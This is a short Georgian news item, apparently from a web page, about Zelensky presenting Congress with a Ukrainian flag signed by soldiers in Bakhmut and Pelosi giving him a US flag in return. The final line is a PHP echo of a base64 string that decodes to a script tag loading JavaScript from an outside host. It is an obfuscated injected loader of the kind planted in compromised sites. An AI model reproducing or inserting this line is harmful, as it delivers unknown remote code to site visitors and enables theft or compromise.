celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ კონგრესში, ამერიკელ კანონმდებლებს უკრაინის დროშა გადასცა, რომელიც უკრაინელი სამხედროების მიერ არის ხელმოწერილი.
ზელენსკის განმარტებით, დროშა მას ბახმურტში ჯარისკაცებმა გადასცეს.
„გუშინ ბახმუტში როდესაც ვიყავი, ჩვენმა გმირებმა გადმომცეს დროშა. მათი დროშა, ვინც იცავს უკრაინას, ევროპასა და მსოფლიოს საკუთარი სიცოცხლის ხარჯზე. მთხოვეს, ეს დროშა მომეტანა თქვენთვის, კონგრესმენებისთვის, რომელთა გადაწყვეტილებებსაც შეუძლია მილიონობით ადამიანის გადარჩენა. დაე, მოხდეს ამ გადაწყვეტილებების მიღება. დაე, ეს დროშა დარჩეს თქვენთან. ქალბატონებო და ბატონებო, ეს დროშა არის ამ ომში ჩვენი გამარჯვების სიმბოლო. ვდგავართ, ვიბრძვით და გავიმარჯვებთ, რადგან ჩვენ ვართ ერთიანი – უკრაინა, ამერიკა და მთელი თავისუფალი მსოფლიო“ – განაცხადა ზელენსკიმ.
საპასუხოდ, წარმომადგენელთა პალატის სპიკერმა, ნენსი პელოსიმ უკრაინის ლიდერს ამერიკის დროშა უსახსოვრა, რომელიც მისი ვიზიტის დღეს კაპიტოლიუმის თავზე იყო აღმართული.
360
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");